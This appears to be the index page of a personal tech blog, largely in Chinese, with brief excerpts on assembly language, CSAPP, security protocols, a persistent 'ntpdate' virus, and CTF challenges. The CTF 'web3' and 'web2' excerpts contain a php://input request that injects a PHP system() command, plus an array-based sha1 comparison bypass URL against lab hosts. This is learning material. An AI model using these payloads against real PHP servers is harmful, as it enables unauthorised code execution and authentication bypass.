buffer_overflow

Posted on 2022-05-14 Edited on 2023-02-28 In Architecture

栈溢出

函数调用时入栈情况

call指令压入返回地址

ret弹出返回地址

Assembly_language

Posted on 2022-05-12 Edited on 2023-02-28 In Architecture

Assembly language

machine language：机器语言是机器指令的集合，机器指令就是机器可以正确执行的命令，由于机器语言难以理解和记忆，产生了汇编语言

汇编语言主体是汇编指令，汇编指令是机器指令的助记符

编译器：将汇编指令转化为机器指令

C++_OOP

Posted on 2022-05-05 Edited on 2023-02-28

思维导图

CSAPP

Posted on 2022-04-27 Edited on 2023-02-28 In Architecture

Preprocessor: replace macro start with #
Compiler: generates a .s file contains assembly-language program. Different compilers generate output file with assembly language.
Assembler: translate into machine codes stored in relocatable object program

IELTS

Posted on 2022-04-02 Edited on 2022-08-18

“Do or do not, there is no try.”

Overall band score: 7.5 (Listening: 7.5 Reading: 9.0 Writing: 6.5 Speaking:6.5)

“End of story.”

secure protocol

Posted on 2022-01-08 Edited on 2023-10-16 In Crypto

安全协议概述

定义：建立在密码算法基础上的一种高互通协议，运行在计算机通信网或分布式系统中，为安全需求的各方提供一系列步骤，借助于密码算法达到密钥分发、身份认证、安全实现网络通信或电子交易的目的

密码算法是安全协议的基础和核心，安全协议是密码算法应用场景
密码协议是安全协议的子集
安全协议就是在消息处理环节使用了若干密码算法的协议，在密码算法的基础上为各种安全性需求提供实现方案

协议的概念包含了以下几层含义:

规定了一系列有序执行的步骤，必须依次执行
协议中有两个或以上的参与者，一个参与者不能构成协议
协议有明确的目的，需要完成的目标，防范的风险

virus

Posted on 2021-11-19 Edited on 2022-07-08

ntpdate

特征

出现在计划任务中
加锁无法直接删除
无法使用chattr去锁

sql2

Posted on 2021-09-16 Edited on 2022-07-08 In CTF

sql注入

web3

Posted on 2021-09-11 Edited on 2022-07-13 In CTF

php伪协议

GET /?page=PHP://input HTTP/1.1
Host: 111.200.241.244:59405
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 41

<?php system("cat fl4gisisish3r3.php");?>

web2

Posted on 2021-09-09 Edited on 2022-07-08 In CTF

Web2

Bugku-各种绕过哟

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])

        print 'passwd can not be uname.';

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))

        die('Flag: '.$flag);

    else

        print 'sorry!';

}
?>

sha1()函数同md5()，可以用数组绕过

1 2	http://114.67.246.176:13558/?id=margin&uname[]=1 postdata:passwd[]=2